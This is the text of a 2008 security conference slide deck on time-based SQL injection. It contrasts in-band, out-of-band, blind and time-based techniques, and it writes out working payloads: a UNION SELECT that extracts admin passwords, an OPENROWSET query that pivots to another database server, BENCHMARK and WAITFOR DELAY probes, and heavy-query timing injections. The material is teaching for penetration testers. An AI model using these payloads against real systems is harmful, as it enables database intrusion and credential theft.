Upload
jakob-digby
View
215
Download
0
Tags:
Embed Size (px)
Citation preview
© 2008 Security-Assessment.com
1
Time Based SQL Injection
Presented by Muhaimin Dzulfakar
© 2008 Security-Assessment.com
2
Who am I
Muhaimin Dzulfakar
Security Consultant – Security-Assessment.com
Application and network pen-tester
© 2008 Security-Assessment.com
3
Agenda
What is time based SQL Injection
Differences between blind and time based SQL Injection
Time based injection with heavy queries
Limitation of time based SQL Injection
© 2008 Security-Assessment.com
4
Different types of SQL Injection
In Band Injection
Out of Band Injection
Blind SQL Injection
Time Based SQL Injection
© 2008 Security-Assessment.com
5
In Band Injection
Results are embedded via union select
Useful when SQL error message is displayed
Fastest way to extract data
Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL null, null, null, null, concat(username,0x3a,admin_password), null from admin/*
© 2008 Security-Assessment.com
6
In Band Injection
© 2008 Security-Assessment.com
7
Out of Band Injection
Use a different communication channel to drill for data
Ex: Web Mail application in which data received via SMTP is
processed
Example of attack: Accessing your neighbour database server with OOB injection
Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT
a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;
Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT
user, pass FROM users') AS a--
© 2008 Security-Assessment.com
8
Out of Band Injection
Web server
Database BDatabase A
OOB Injection
www.buyviagra.com
10.1.1.1
© 2008 Security-Assessment.com
9
Blind SQL Injection
Application generates custom error message for failed response and normal page for successful response
Comparison between true and false response
AND 1=1 -> true AND 1=2 -> false
Read data byte by byte
© 2008 Security-Assessment.com
10
Blind SQL Injection
© 2008 Security-Assessment.com
11
Blind SQL Injection
© 2008 Security-Assessment.com
12
Time Based SQL Injection
Use time delay to differentiate between true and false
True response – time delay is executed
Failed response – time delay is not executed
Read data byte by byte – exactly the same method as blind injection
First example by Chris Anley's paper – More advanced SQL Injection
Another example is in David Litchfield paper – Data Mining with SQL Injection and Inference
© 2008 Security-Assessment.com
13
When we need Time Based SQL Injection
When the application generates default page for true or false response
When the application generates the same custom error page for true or false response
Injection is successful but can't be seen by the attacker
© 2008 Security-Assessment.com
14
Scenario 1 (Blind Injection attack)
$default=1$default=1
if value is not between 1-20if value is not between 1-20
{{
redirect user to page.php?id=$defaultredirect user to page.php?id=$default
execute SQL statementexecute SQL statement
}}
1 AND 1=1 [TRUE] -> default page displayed1 AND 1=1 [TRUE] -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed1 AND 1=2 [FALSE] -> default page displayed
BLIND INJECTION FAILED!BLIND INJECTION FAILED!
© 2008 Security-Assessment.com
15
Scenario 1 (Time Based Blind Injection attack)
$default=1$default=1
if value is not between 1-20if value is not between 1-20
{{
redirect user to page.php?id=$defaultredirect user to page.php?id=$default
execute SQL statementexecute SQL statement
}}
1 AND 1=1 [TRUE] -> takes 5 seconds to 1 AND 1=1 [TRUE] -> takes 5 seconds to response response
1 AND 1=2 [FALSE] -> takes 1 second to 1 AND 1=2 [FALSE] -> takes 1 second to responseresponse
TIME BASED BLIND INJECTION TIME BASED BLIND INJECTION
WORKS!WORKS!
© 2008 Security-Assessment.com
16
Time Based SQL Injection
TRUE = 2478msFALSE = 117ms
© 2008 Security-Assessment.com
17
Spot the different
Blind Injection (for MySql)
1 AND ASCII(substring((@@version),1,1))<52
If the first character of the database version is less than 4,
it is true
If the first character of database version is 4 or more, it is
false query position operator
char
© 2008 Security-Assessment.com
18
Spot the different
Time Based Blind injection (for MySQL)
1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))
If the first character of database version is less than 4,
execute BENCHMARK
If the first character of database version is not less than
4,do not execute BENCHMARKposition
operator time delayquery
char count time
© 2008 Security-Assessment.com
19
Time Based Injection on MSSQL
Time Based Injection (MSSQL)
1 AND if not(substring((select @version),25,1) < 52)
waitfor delay '0:0:9'--
If the first character less than 4, execute “waitfor delay”
time delay
query
position operator char
© 2008 Security-Assessment.com
20
Other Databases
Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions
Time Based Injection is possible by using heavy queries
Chema Alonso and Jose Prada talked about this in Defcon 2008
2 types of conditions in 'where clause'
Light Condition first
Heavy Condition first
Select A from B where ConditionAConditionA and ConditionBConditionB
© 2008 Security-Assessment.com
21
Heavy condition first
100 Seconds
False-False
110 Seconds
TrueTrueTrue
110 Seconds
FalseFalseTrue
ResultHeavy & Light Condition
Light Condition
10sec
Heavy condition
100sec
Result from Alonso research
© 2008 Security-Assessment.com
22
Light condition first
10Seconds
False-False
110 Seconds
TrueTrueTrue
110 Seconds
FalseFalseTrue
ResultHeavy & Light Condition
Heavy Condition
100sec
Light condition
10sec
Result from Alonso research
© 2008 Security-Assessment.com
23
Heavies Queries
Oracle evaluates the conditions from left to right
MS Access evaluates the conditions from right to left
MSSQL evaluates light condition first
Table name needs to be known
Some of the well known default tables
MSSQL – sysussers
MySQL – information_schema.colums
Oracle - all_users
© 2008 Security-Assessment.com
24
Heavies Queries
Example of time based injection using heavy queries on MSSQL (light condition evaluates first)
1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)
Suitable for databases that do not support time delay functions
Ex: Oracle and MS Accessheavy querylight query
© 2008 Security-Assessment.com
25
Limitation
Results are not efficient during the busy times
Time delay results also depend on how much data stored in the table
© 2008 Security-Assessment.com
26
Demo